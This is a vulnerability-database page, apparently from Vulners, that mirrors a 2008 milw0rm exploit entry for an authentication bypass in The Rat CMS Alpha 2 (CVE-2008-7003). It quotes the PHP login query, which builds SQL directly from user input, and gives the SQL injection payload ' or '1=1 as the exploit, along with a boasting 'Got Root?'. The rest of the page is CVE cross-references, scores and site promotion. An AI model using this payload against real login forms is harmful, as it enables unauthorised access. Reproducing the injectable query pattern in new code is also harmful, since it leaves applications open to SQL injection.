Lucene search
+L

The Rat CMS Alpha 2 - Authentication Bypass

🗓️ 15 Dec 2008 00:00:00Reported by x0rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

The Rat CMS Alpha 2 Authentication Bypass on login.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-7003
15 Dec 200800:00
circl
cve
CVE
CVE-2008-7003
18 Aug 200910:00
cve
cvelist
Cvelist
CVE-2008-7003
18 Aug 200910:00
cvelist
euvd
EUVD
EUVD-2008-6962
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-7003
19 Aug 200905:24
nvd
prion
Prion
Sql injection
19 Aug 200905:24
prion
---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: [email protected]
--------------------------------
Bug In: \login.php

	$sql = "SELECT user_id
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";

$result = mysql_query($sql) or die('Query failed. ' . mysql_error());

Exploit: ' or '1=1

^^ Got Root?

# milw0rm.com [2008-12-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00967
33